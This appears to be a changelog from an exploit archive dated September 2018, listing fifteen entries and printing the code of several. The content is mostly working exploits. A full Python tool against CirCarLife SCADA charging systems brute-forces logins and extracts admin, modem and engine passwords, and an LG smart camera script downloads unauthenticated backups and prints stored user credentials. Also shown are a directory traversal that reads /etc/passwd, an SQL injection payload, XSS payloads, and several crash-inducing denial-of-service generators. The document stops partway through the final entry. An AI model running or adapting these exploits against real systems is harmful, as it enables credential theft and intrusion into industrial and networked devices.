DB: 2018-09-13

15 changes to exploits/shellcodes

jiNa OCR Image to Text 1.0 - Denial of Service (PoC)
PixGPS 1.1.8 - Denial of Service (PoC)
RoboImport 1.2.0.72 - Denial of Service (PoC)
PicaJet FX 2.6.5 - Denial of Service (PoC)
iCash 7.6.5 - Denial of Service (PoC)
PDF Explorer 1.5.66.2 - Denial of Service (PoC)
Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)
Apple macOS 10.13.4 - Denial of Service (PoC)
CirCarLife SCADA 4.3.0 - Credential Disclosure
Rubedo CMS 3.4.0 - Directory Traversal
SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)
SynaMan 4.0 build 1488 - SMTP Credential Disclosure
IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection
MyBB 1.8.17 - Cross-Site Scripting
LG Smart IP Camera 1508190 - Backup File Download

exploits/hardware/webapps/45384.py

@@ -0,0 +1,371 @@
+# Exploit Title: CirCarLife SCADA 4.3.0 - Credential Disclosure	
+# Date: 2018-09-10
+# Exploit Author: David Castro
+# Vendor Homepage: https://circontrol.com/
+# Shodan Dork: Server: CirCarLife Server: PsiOcppApp
+# Version: CirCarLife Scada all versions under 4.3.0 OCPP implementation all versions under 1.5.0
+# CVE : CVE-2018-12634
+
+'''
+Description: Mutiple information disclosure issues, including admin credentials disclosure
+'''
+
+import requests
+from requests.auth import HTTPDigestAuth
+from termcolor import colored
+from bs4 import BeautifulSoup
+import xml.etree.ElementTree as ET
+import re
+import json
+import base64 
+
+cabecera = '''
+                              _.-="_-         _
+                         _.-="   _-          | ||"""""""---._______     __..
+             ___.===""""-.______-,,,,,,,,,,,,`-''----" """""       """""  __'
+      __.--""     __        ,'     CIR-PWN-LIFE  o \            __        [__|
+ __-""=======.--""  ""--.=================================.--""  ""--.=======:
+]       [w] : /        \ : |========================|    : /        \ :  [w] :
+V___________:| SadFud75 |: |========================|    :|          |:   _-"
+ V__________: \        / :_|=======================/_____: \        / :__-"
+ -----------'  "-____-"  `-------------------------------'  "-____-"
+
+'''
+
+print colored(cabecera, 'white')
+print colored('[*] POC for automated exploitation for CirControl SCADA systems (circarlife and OCPP (Open Charge Point Protocol))', 'blue')
+print colored('[?] Vendor site: https://circontrol.com/', 'yellow')
+print colored('[*] CVEs associated: ', 'blue') 
+print colored('CVE-2018-12634, CVE-2018-16668, CVE-2018-16669, CVE-2018-16670, CVE-2018-16671, CVE-2018-16672', 'yellow')
+print colored('[*] CirCarLife Scada versions affected: ', 'blue') 
+print colored('[+] All versions are vulnerable. No patch available, last version 4.3.0 (09/09/2018)', 'green')
+print colored('[*] PsiOcppApp (PowerStudio integration Open Charge Point Protocol Application) versions affected: ', 'blue') 
+print colored('[+] All versions are vulnerable. No patch available, last version 1.5.0 (09/09/2018)', 'green')
+print colored('[*] Shodan dorks: ', 'blue')
+print colored('[+] Server: CirCarLife', 'green')
+print colored('[+] Server: PsiOcppApp', 'green')
+print colored('[?] More vulnerability POCs at https://github.com/SadFud/Exploits', 'yellow')
+
+plcs = []
+logutil = ['GPRS modem details']
+autenticado = False
+
+arr_versionessoft = []
+arr_ldevstat = []
+str_repository = ''
+str_lversioneshard = ''
+arr_logdetails = []
+str_lsetup = ''
+str_lconfig = ''
+
+def lversionessoft(): 
+    print colored('[*] Getting software versions via CVE-2018-16671', 'blue')
+    leakv = requests.get(target1 + '/html/device-id')
+    versiones = leakv.text.encode("utf8").split('\n')
+    print colored('[+] Software versions collected succesfully', 'green')
+    return versiones
+
+def ldevstat(): 
+    print colored('[*] Getting plc status via CVE-2018-16670', 'blue')
+    leakstats = requests.get(target1 + '/services/user/values.xml?var=STATUS')
+    statsraw = leakstats.text
+    tree = ET.fromstring(statsraw)
+    for i in range(0,len(tree.findall(".//variable"))):
+        for j in range(0,2):
+            plcs.append(tree[i][j].text)
+    print colored('[+] information leaked from ' + str(len(plcs)/2) + ' plcs', 'green')
+    return plcs
+
+def plcstatus(code): 
+    code = int(code)
+    if code == 1:
+        print colored('[+] OK', 'green')
+    elif code == 2:
+        if code == 0x10:
+            if code == 0x20:
+                print colored('[-] Error: Time out.', 'red')
+            elif code == 0x40:
+                print colored('[-] Error: Bad device.', 'red')
+            elif code == 0x80:
+                print colored('[-] Error: Bad phase.', 'red')
+            elif code == 0x100:
+                print colored('[-] Error: Bad version.', 'red')
+        else:
+            print colored('[-] Error: Unknown error.', 'red')
+    elif code == 4:
+        print colored('[-] Error: not initialized.', 'red')
+    else:
+        print colored('[?] Unknown code.', 'yellow')
+
+def repository(): 
+    print colored('[*] Getting installation paths via CVE-2018-16668', 'blue')
+    path = requests.get(target1 + '/html/repository')
+    rutas = path.text.encode("utf8").split('\n')
+    platformpath = rutas[1].split(' ')
+    platformpath = platformpath[0]
+    appsrc = rutas[3]
+    appsrc = rutas[3].split(' ')
+    appsrc = appsrc[0]
+    raiz = str(appsrc).find('/circarlife/')
+    appsrc = appsrc[0:raiz+len('/circarlife/')]
+    print colored('[+] Platform installation path retrieved succesfully', 'green')  
+    return 'Platform installation path: ' + platformpath + '\n[+] Applicaction installation path: ' + appsrc
+    
+def lversioneshard(): 
+    print colored('[*] Getting powerstudio driver versions via CVE-2018-12634', 'blue')
+    basura = ['/li', '<', 'body', 'html', '>', '/ul', '/']
+    hardleak = requests.get(target1 + '/services/system/info.html')
+    hardleak = hardleak.text.encode("utf8").replace('<br />', '\n')
+    hardleak = hardleak.replace('<li>', '\n')
+    for caca in basura:
+        hardleak = hardleak.replace(caca, '')
+    print colored('[+] Powerstudio driver versions leaked succesfully', 'green')
+    return hardleak
+
+def logdetails():
+    print colored('[*] Leaking sensitive information via CVE-2018-12634', 'blue')
+    log = requests.get(target1 + '/html/log')
+    log = log.text.encode("utf8")
+    print colored('[*] Searching for modem id', 'blue')
+    posmid = log.rfind('/modem-start: modem id: ')
+    logarr = log.split('\n')    
+    if posmid != -1:
+        logutil.append('Modem model:')
+        print colored('[*] Modem id located', 'blue')
+        for linea in logarr:
+            if '/modem-start: modem id: ' in linea:
+                print colored('[+] Modem id leaked', 'green')            
+                linea = linea.split(' ')
+                logutil.append(linea[9])
+    else:
+        print colored('[-] Modem id not found', 'red')
+    print colored('[*] Searching for GPRS modem credentials', 'blue')
+    poslogin = log.rfind('Greetings!!')
+    if poslogin != -1:
+        print colored('[*] Credentials found', 'blue')
+        logutil.append('Modem credentials')
+        print colored('[+] GPRS modem credentials retrieved', 'green')
+        for linea in logarr:
+            if 'password=\"' in linea:
+                linea = linea.split(' ')
+                logutil.append(linea[11])
+                logutil.append(linea[12])
+    else:
+        print colored('[-] GPRS modem credentials not found with CVE-2018-12634', 'red')
+    return logutil
+
+def lsetup(user, pwd): 
+    print colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue')
+    r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user, pwd))
+    if r1.text.encode("utf8").find('not granted') != -1:
+        print colored('[-] Error, login failed', 'red')
+    else:
+        respuesta = r1.text.encode("utf8")
+        print colored('[+] Setup information leaked')
+        return respuesta
+
+def lbrute():
+    global luser80
+    global lpasswd80
+    global luser8080
+    global lpasswd8080
+    dicc = raw_input('Enter dictionary file with extension[format[user:password]]: ')
+    listado = open(dicc, "r")
+    data = listado.readlines() 
+    print colored('[*] Starting bruteforce...', 'blue')
+    for linea in data:
+        linea = linea.split(':')
+        user = linea[0]
+        pwd = linea[1]
+        r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
+        r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
+        if r1.text.encode("utf8").find('not granted') != -1:
+            print colored('[-] Error, login failed on port 80 with ' + user + ':' + pwd, 'red')
+        else:
+            print colored('[+] Valid credentials found on port 80: ' + user + ':' + pwd, 'green')
+            luser80 = user
+            lpasswd80 = pwd
+        if r2.text.encode("utf8").find('Acess not granted') != -1:
+            print colored('[-] Error, login failed on port 8080 with ' + user + ':' + pwd, 'red')
+        else:
+            print colored('[+] Valid credentials found on port 8080: ' + user + ':' + pwd, 'green')
+            luser8080 = user
+            lpasswd8080 = pwd
+    listado.close()
+
+def lconfig(user, pwd):
+    print colored('[*] Leaking config file via CVE-2018-16669', 'blue')
+    r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
+    if r2.text.encode("utf8").find('Acess not granted') != -1:
+        print colored('[-] Error. Login failed', 'red')
+    else:
+        config = r2.text.encode('utf8')
+        print colored('[+] Config file leaked succesfully', 'green')
+        return config
+
+def salida(versiones, plcs, ruta, hard, log, setup, config):
+    print colored('[*] Parsing information and generating output.', 'blue')
+    print colored('[*] Parsing software information', 'blue')
+    print colored('[+] Device name: ', 'green') + versiones[0]
+    print colored('[+] Software_name: ', 'green') + versiones[1]
+    print colored('[+] Software_version: ', 'green') + versiones[2] 
+    print colored('[+] System time: ', 'green') + versiones[3]
+    print colored('[+] ', 'green') + ruta
+    print colored('[*] Parsing powerstudio driver versions', 'blue')
+    hard = hard.replace('ul', '')
+    print colored(hard.strip(), 'green')
+    print colored('[*] Parsing PLCs values', 'blue')
+    for i in range(0,len(plcs)):
+        if ((i % 2) != 0):
+            codigo = plcs[i].split('.')
+            plcstatus(codigo[0])
+        else:
+            nombre = plcs[i].replace('.STATUS', '')
+            print colored('[+] PLC name: ' + nombre, 'green')
+    print colored('[*] Parsing leaked data from logs using CVE-2018-12634', 'blue')
+    if len(log) > 3:
+        print colored('[*] ' + log[0], 'blue')
+        for i in range(2,len(log)):
+            if log[i] != 'Modem credentials':
+                print colored('[+] GPRS router model found: ', 'green') + log[i]
+                break
+        for i in range(0,len(log)):
+            if log[i] == 'Modem credentials':
+                creds = i
+                break
+
+        for i in range(creds + 1, len(log)):
+            if (log[i].rfind('user=')) != -1:
+                usuario = log[i].split('=')
+                user = usuario[1]
+                user = user.replace('\"', '')
+            if (log[i].rfind('password=')) != -1:
+                cont = log[i].split('=')
+                contrase = cont[1]
+                contrase = contrase.replace('\"', '')
+                contrase = contrase.replace(']', '')
+                break
+        print colored('[+] Username and password for GPRS modem found: ', 'green') + user + ':' + contrase
+    else:
+        colored('[?] No data was extracted from logs using CVE-2018-12634', 'yellow')
+    print colored('[*] Parsing setup file', 'blue')
+    if (len(str(setup)) > 5):
+        datos = json.loads(setup)
+        print colored('[*] Processing device configuration data: ', 'blue')
+        print colored('[+] MAC Address: ', 'green') + datos["device"]["mac"]
+        print colored('[+] IMEI: ', 'green') + datos["device"]["imei"]
+        print colored('[+] ICCID: ', 'green') + datos["device"]["iccid"]
+        print colored('[+] IMSI: ', 'green') + datos["device"]["imsi"]
+        print colored('[*] Processing network configuration data: ', 'blue')
+        print colored('[+] Hostname: ', 'green') + datos["network"]["hostname"]
+        print colored('[+] ClientId: ', 'green') + datos["network"]["clientid"]
+        print colored('[+] IP address: ', 'green') + datos["network"]["ip"]
+        print colored('[+] Netmask: ', 'green') + datos["network"]["netmask"]
+        print colored('[+] Gateway: ', 'green') + datos["network"]["gateway"]
+        print colored('[+] Name server 0: ', 'green') + datos["network"]["nameserver0"]
+        print colored('[+] Name server 1: ', 'green') + datos["network"]["nameserver1"]
+        print colored('[*] Processing locale options configuration data', 'blue')
+        print colored('[+] Language: ', 'green') + datos["locale"]["language"]
+        print colored('[+] Currency: ', 'green') + datos["locale"]["currency"]
+        print colored('[*] Processing public address configuration data', 'blue')
+        print colored('[+] Host type: ', 'green') + datos["paddress"]["hosttype"]
+        print colored('[+] Host: ', 'green') + datos["paddress"]["host"]
+        print colored('[*] Processing time configuration data', 'blue')
+        print colored('[+] NTP Server 0: ', 'green') + datos["time"]["ntpserver0"]
+        print colored('[+] NTP server 1: ', 'green') + datos["time"]["ntpserver1"]
+        print colored('[+] Timezone: ', 'green') + datos["time"]["timezone"]
+        print colored('[*] Processing GPRS modem configuration data', 'blue')
+        print colored('[+] Acess point name: ', 'green') + datos["modem"]["apn"]
+        print colored('[+] Username: ', 'green') + datos["modem"]["usr"]
+        print colored('[+] Password: ', 'green') + datos["modem"]["pwd"]
+        print colored('[+] Reset: ', 'green') + str(datos["modem"]["reset"])
+        print colored('[+] Ping Ip: ', 'green') + str(datos["modem"]["pingip"])
+        print colored('[+] Ping period: ', 'green') + str(datos["modem"]["pingperiod"])
+        print colored('[+] Ping auto reset: ', 'green') + str(datos["modem"]["pingautoreset"])
+        print colored('[*] Processing DDNS configuration data', 'blue')
+        print colored('[+] DDNS server: ', 'green') + datos["ddns"]["server"]
+        print colored('[+] DDNS host: ', 'green') + datos["ddns"]["host"]
+        print colored('[+] DDNS Username: ', 'green') + datos["ddns"]["usr"]
+        print colored('[+] DDNS password: ', 'green') + datos["ddns"]["pwd"]
+        print colored('[*] Processing security configuration data', 'blue')
+        print colored('[+] Username: ', 'green') + datos["security"]["user"]
+        print colored('[+] Password: ', 'green') + str(datos["security"]["passwd"])
+        print colored('[*] Processing services configuration data', 'blue')
+        print colored('[+] iManager', 'green') + str(datos["services"]["imanager"])
+        print colored('[+] Active-Integration: ', 'green') + str(datos["services"]["activeIntegration"])
+        print colored('[+] Web Editor: ', 'green') + str(datos["services"]["webeditor"])
+        print colored('[+] SCADA Applet: ', 'green') + str(datos["services"]["appletscada"])
+        print colored('[+] Html5: ', 'green') + str(datos["services"]["html5"])
+        print colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue')
+    else:
+        print colored('[-] Unable to retrieve the setup config file', 'red')
+    if (len(str(config)) > 10):
+        tree = ET.fromstring(config)
+        print colored('[*] Processing management system CS settings', 'blue')
+        print colored('[+] End point: ', 'green') + str(tree.find('.//csEndPoint').text)
+        print colored('[+] Username: ', 'green') + str(tree.find('.//csUser').text)
+        print colored('[+] Password: ', 'green') + str(tree.find('.//csPassword').text)
+        print colored('[+] Litle endian: ', 'green') + str(tree.find('.//isLitleEndian').text)
+        print colored('[*] Processing Charge Box settings file', 'blue')
+        print colored('[+] Charge box Protocol: ', 'green') + str(tree.find('.//cbProtocol').text)
+        print colored('[+] Charge box certificate: ', 'green') + str(tree.find('.//cbRequireCsClientCertificate').text)
+        print colored('[+] Charge box ID: ', 'green') + str(tree.find('.//cbId').text)
+        print colored('[+] Charge box Username: ', 'green') + str(tree.find('.//cbUser').text)
+        print colored('[+] Charge box password: ', 'green') + str(tree.find('.//cbPassword').text)
+        print colored('[+] Charge box OCPP internal port: ', 'green') + str(tree.find('.//cbOcppPortInternal').text)
+        print colored('[+] Charge box OCPP public port: ', 'green') + str(tree.find('.//cbOcppPortPublic').text)
+        print colored('[+] Charge box use whitelist: ', 'green') + str(tree.find('.//cbUseWl').text)
+        print colored('[+] Charge box whitelist first: ', 'green') + str(tree.find('.//cbWlFirst').text)
+        print colored('[+] Charge box offline authentication: ', 'green') + str(tree.find('.//cbAuthOffline').text)
+        print colored('[+] Charge box internal error retry delay: ', 'green') + str(tree.find('.//cbRetryInternalErr').text)
+        print colored('[+] Charge box use OCPP T-Sync: ', 'green') + str(tree.find('.//cbUseOcppTSync').text)
+        print colored('[+] Charge box use compression: ', 'green') + str(tree.find('.//cbUseCompression').text)
+        print colored('[+] Charge box use aprtial energy: ', 'green') + str(tree.find('.//cbUsePartialEnergy').text)
+        #print colored('[+] Charge box use partial energy meter value: ', 'green') + str(tree.find('.//cbUsePartialEnergyMeterVal').text)
+        print colored('[+] Charge box stop if unauthenticated: ', 'green') + str(tree.find('.//cbStopIfUnauth').text)
+        print colored('[+] Charge box stop if concurrent tx: ', 'green') + str(tree.find('.//cbStopIfConcurrentTx').text)
+        print colored('[+] Charge box hearth-beat interval: ', 'green') + str(tree.find('.//cbHbInterval').text)
+        print colored('[+] Charge box connection time out interval: ', 'green') + str(tree.find('.//cbConnTimeOut').text)
+        print colored('[+] Charge box meter interval: ', 'green') + str(tree.find('.//cbMeterInterval').text)
+        #print colored('[+] Charge box public Ip timeout interval: ', 'green') + str(tree.find('.//cbPublicIpTimeOut').text)
+        #print colored('[+] Charge box authentication required for remote start: ', 'green') + str(tree.find('.//cbRequireAuthRemoteStart').text)
+        #print colored('[+] Charge box meter requires power: ', 'green') + str(tree.find('.//cbMeterValRequiresPower').text)
+        print colored('[*] Processing Powerstudio engine settings file' , 'blue')
+        print colored('[+] Powerstudio engine host: ', 'green') + str(tree.find('.//pwStdHost').text)
+        print colored('[+] Powerstudio engine port: ', 'green') + str(tree.find('.//pwStdPort').text)
+        print colored('[+] Powerstudio engine username: ', 'green') + str(tree.find('.//pwStdUser').text)
+        print colored('[+] Powerstudio engine password: ', 'green') + base64.b64decode(str(tree.find('.//pwStdPassword').text))
+        print colored('[+] Powerstudio engine username (with edit permissions): ', 'green') + str(tree.find('.//pwStdUserEdit').text)
+        print colored('[+] Powerstudio engine password (with edit permissions): ', 'green') + base64.b64decode(str(tree.find('.//pwStdPasswordEdit').text))
+        print colored('[*] Processing powerstudio application parameters', 'blue')
+        print colored('[+] Powerstudio application port: ', 'green') + str(tree.find('.//pssPort').text)
+        print colored('[+] Powerstudio application admin: ', 'green') + str(tree.find('.//pssAdminUser').text)
+        print colored('[+] Powerstudio application password: ', 'green') + base64.b64decode(str(tree.find('.//pssAdminPassword').text))
+        print colored('[+] Powerstudio application debug logging level: ', 'green') + str(tree.find('.//pssLoglevel').text)
+    else:
+        print colored('[-] Unable to retrieve the OCPP config file', 'red')
+
+#entrypoint
+url = raw_input('Insert target ip: ')
+target1 = 'http://' + url 
+target2 = 'http://' + url + ':8080'
+luser80 = 'admin'
+lpasswd80 = '1234'
+luser8080 = 'admin'
+lpasswd8080 = '1234'
+luser80 = raw_input('Insert username for login at circarlife server: (b to bruteforce)')
+if (luser80 == 'b'):
+    lbrute()
+else:    
+    lpasswd80 = raw_input('Insert password for login at circarlife server: ')
+    luser8080 = raw_input('Insert username for login at OCPP server: ')
+    lpasswd8080 = raw_input('Insert password for login at OCPP server: ')
+
+versiones = lversionessoft()   
+plcs = ldevstat()
+ruta = repository()
+hard = lversioneshard()
+log = logdetails()
+setup = lsetup(luser80.strip(), lpasswd80.strip())
+config = lconfig(luser8080.strip(), lpasswd8080.strip())
+salida(versiones, plcs, ruta, hard, log, setup, config)

exploits/hardware/webapps/45394.py

@@ -0,0 +1,113 @@
+# Exploit Title: LG Smart IP Camera 1508190 - Backup File Download
+# Date: 2018-09-11
+# Exploit Author: Ege Balci
+# Vendor Homepage: https://www.lg.com
+# Software version: 1310250 <= 1508190
+# Model: LNB*/LND*/LNU*/LNV*
+# CVE: CVE-2018-16946
+
+# Description: smart network camera devices have broken access control. Attackers are able to 
+# download /updownload/t.report (aka Log & Report) files and download backup files (via download.php) 
+# without authenticating. These backup files contain user credentials and configuration information for 
+# the camera device. An attacker is able to discover the backup filename via reading the system logs or 
+# report data, or just by brute-forcing the backup filename pattern. It may be possible to authenticate 
+# to the admin account with the admin password.
+
+# lg_smart_ip.py
+
+#!/usr/bin/python3
+
+import os
+import sys
+import sqlite3
+import tarfile
+import requests    
+import datetime
+import threading
+
+if len(sys.argv) < 2:
+    print("Usage:\n\t"+sys.argv[0]+" <TARGET-URL>")
+    exit(0)
+
+print("#==========================================================================#")
+print("# Exploit Title: LG Smart IP Device Backup Download")
+print("# Date: 09-11-2018")
+print("# Exploit Author: Ege Balcı")
+print("# Vendor Homepage: https://www.lg.com")
+print("# Model: LNB*/LND*/LNU*/LNV*")
+print("# CVE: CVE-2018-16946")
+print("#==========================================================================#\n\n")
+
+model_version_list = ["2219.0.0.1505220","2745.0.0.1508190","1954.0.0.1410150", "1030.0.0.1310250"] 
+
+# First try the default login creds...
+headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
+default = requests.get(sys.argv[1]+"/httpapi?GetDeviceInformation", headers=headers)
+if "Model:" in default.text:
+    print("[+] Default password works  (admin:admin)")
+    # exit(0)
+
+
+def brute(model_version):
+    date = datetime.datetime.now()
+    u = (['\\','|','/','-'])
+
+    for i in range(0,3650): # No need to go back futher these cameras didn't existed 10 years ago 
+        sys.stdout.flush()
+        sys.stdout.write("\r[*] Bruteforing backup date...{0}".format(u[i%4]))
+
+        log_date = date.strftime("%y")
+        log_date += date.strftime("%m")
+        log_date += date.strftime("%d")        
+
+        url = "/download.php?file="
+        backup_name = "backup_"
+        backup_name += log_date
+        backup_name += "_"+model_version+".config"
+
+        
+        ContentLength = requests.head(sys.argv[1]+url+backup_name,stream=True).headers["Content-Length"]
+        if ContentLength != "":
+            backup = requests.get(sys.argv[1]+url+backup_name)
+            print("\n[+] Backup file found !")
+            print("[+] "+backup_name+" -> "+str(len(backup.content))+"\n")
+            backup_file = open(backup_name+".tar.gz","wb")
+            backup_file.write(backup.content)
+            backup_file.close()
+            tar = tarfile.open(str(backup_name+".tar.gz"),mode="r:gz")
+            for member in tar.getnames():
+                # Print contents of every file
+                print("[>] "+member)
+                mem = open(member,"wb")
+                mem.write(tar.extractfile(member).read())
+            
+            
+            conn = sqlite3.connect('mipsca.db')
+            c = conn.cursor()
+            users = c.execute("SELECT * FROM User")
+            print("#=============== SUCCESS ===============#")
+            for u in users:
+                print("\n[#] Username: "+u[0])
+                print("[#] Password: "+u[1])
+            os.system("rm mipsca.db ConfigInfo.txt "+ backup_name+".tar.gz")
+            break
+        date = (date-datetime.timedelta(days=1))
+
+
+
+report = requests.get(sys.argv[1]+"/updownload/t.report",verify=False)
+if report.status_code != 200:
+    print("[-] Target device don't have report data :(")
+    jobs = []
+    for mv in model_version_list:
+        t = threading.Thread(target=brute(mv))
+        jobs.append(t)
+
+    for j in jobs:
+        j.start()
+else:
+    model_id = (((report.text.split("= "))[1]).split("\n"))[0]
+    print("[+] Model ID: "+model_id)
+    version = (((report.text.split("= "))[2]).split("\n"))[0]
+    print("[+] Version: "+version)
+    brute(model_id+"."+version)

exploits/linux/webapps/45385.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
+# Google Dork: intext:rubedo.current.page.description
+# Date: 2018-09-11
+# Exploit Author: Marouene Boubakri
+# Vendor Homepage: https://www.rubedo-project.org
+# Version: through 3.4.0
+# Tested on: Linux
+# CVE : CVE-2018-16836
+
+# PoC:
+# Read /etc/passwd file from remote server
+
+/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'

exploits/macos/dos/45391.py

@@ -0,0 +1,26 @@
+# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)
+# Date: 2019-09-10
+# Exploit Author: Sriram (@Sri_Hxor)
+# Vendor Homepage: https://support.apple.com/en-in/HT208848
+# Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0
+# CVE : CVE-2018-4240 (2018)
+# POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf
+
+# Crashing Phone via RLM character. 
+# Steps to Reproduce, 
+
+# Run the below python script as "python apple.py", it will create a file called "dos_apple.txt"
+# Copy the text from the generated apple.txt
+# Paste it in WhatsApp and send it, victim gotta click and it will start crashing
+
+end = "‮ereh-hcuot-t'nod"
+dos = "‎‏"
+payload = dos*1000 + end
+try:
+    f=open("dos_apple.txt","w")
+    print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos))
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "Can't create a file, check DIR permissions?"

exploits/php/webapps/45392.txt

@@ -0,0 +1,43 @@
+# Exploit Title: [Unauthenticated Remote SQLi]
+# Date: [11/09/2018]
+# Exploit Author: [Mohamed Sayed - From SecureMisr Company]
+# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10728883]
+# Version: [IGI 5.2.3.2] (REQUIRED)
+# Tested on: [Windows 10]
+# CVE : [CVE-2018-1756]
+
+Hello ,
+IBM IGI version 5.2.3.2 is suffering from unauthenticated remote SQLi
+The vulnerability enable *remote unauthenticated* attacker to take over the
+server database and affect the confidentiality , integrity and availability
+of the system ,
+
+The vulnerability is in the survey end point API
+/survey/api/config?userId=XXX
+
+The userId parameter value is injected directly to a sql query without
+sensitization nor validation and by exploiting it the attacker will be able
+to gain access on the server database
+
+SAMPLE of Vulnerable HTTP Request
+
+GET /survey/api/config?userId=VUL HTTP/1.1
+Host: HOST_IP
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
+Accept: */*
+Referer: https://HOST_IP
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+Payload sample :
+userId=1 'AND 1=1 AND '2'='2
+
+
+Mohamed Sayed
+Sr.Information Security analyst
+
+*Please make sure to encrypt any sensitive information or attachments , you
+can download my Public PGP key from* here
+<https://keys.mailvelope.com/pks/lookup?op=get&search=0x238EFF7331E6E927>

exploits/php/webapps/45393.txt

@@ -0,0 +1,21 @@
+# Exploit Title: MyBB 1.8.17 - Cross-Site Scripting
+# Date: 2018-08-11
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://mybb.com/download/
+# Version: 1.8.17
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-15596
+
+# 1. Description:
+# On the forum RSS Syndication page you can generate a URL for example... 
+# http://localhost/syndication.php?fid=&type=atom1.0&limit=15, the thread titles on 
+# those generated links aren't sanitized. 
+ 
+# 2. Proof of Concept:
+
+- Make or find a thread of yours on the RSS feed
+- Use this payload as the thread title  <a href="//google.com">Cool Thread Title</a>
+- View RSS feed with your thread again but with the generated URL and click on your thread
+- When the thread is clicked you will be redirected to google.com

exploits/windows/dos/45388.py

@@ -0,0 +1,25 @@
+# Exploit Title: iCash 7.6.5 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-12
+# Software Link: https://www.maxprog.com/site/misc/downloads_us.php
+# Tested Version: 7.6.5
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "File" > "Connect to Server..."
+# Now paste the contents of "exploit.txt" into the fields:"Host"
+# Click the "Connect" button and you will see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 7000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/dos/45389.py

@@ -0,0 +1,25 @@
+# Exploit Title: PDF Explorer 1.5.66.2 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-12
+# Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip
+# Tested Version: 1.5.66.2
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "Database" > "Custom fields settings..."
+# Now paste the contents of "exploit.txt" into the fields:"Label"
+# Click the "OK" button and you will see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 7000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/dos/45390.py

@@ -0,0 +1,25 @@
+# Exploit Title: Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-12
+# Software Link: https://www.infiltration-systems.com/download.shtml
+# Tested Version: 4.6
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program.
+# Now paste the contents of "exploit.txt" into the fields:"Scan Target"
+# Click the "Scan" button, wait and you will see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/webapps/45386.txt

@@ -0,0 +1,39 @@
+# Exploit Author: bzyo
+# CVE: CVE-2018-10763
+# Twitter: @bzyo_
+# Exploit Title: SynaMan 4.0 - Authenticated Cross Site Scripting (XSS)
+# Date: 09-12-18
+# Vulnerable Software: SynaMan 4.0 build 1488
+# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
+# Version: 4.0 build 1488
+# Software Link: http://web.synametrics.com/SynaManDownload.htm
+# Tested On: Windows 7 x86
+  
+Description
+-----------------------------------------------------------------
+SynaMan 4.0 suffers from Authenticated Cross Site Scripting (XSS)
+
+
+Prerequisites
+-----------------------------------------------------------------
+Admin access to Synaman web console
+ 
+Proof of Concept
+-----------------------------------------------------------------
+From Configuration > Advanced Configuration > Partial Branding
+- Main heading
+- Sub heading
+
+If one were to apply the following XSS payload in either of the fields, alert pop-ups with xss would be present on navigation throughout the web app
+
+<script>alert("xss");</script>
+
+While Chrome does block the XSS payload on apply, simply hitting the back button and selecting "Explore" the payload is stored
+
+ 
+Timeline
+---------------------------------------------------------------------
+05-07-18: Vendor notified of vulnerabilities
+05-08-18: Vendor responded and will fix 
+07-25-18: Vendor fixed in new release
+09-12-18: Submitted public disclosure

exploits/windows/webapps/45387.txt

@@ -0,0 +1,45 @@
+# Exploit Author: bzyo
+# CVE: CVE-2018-10814
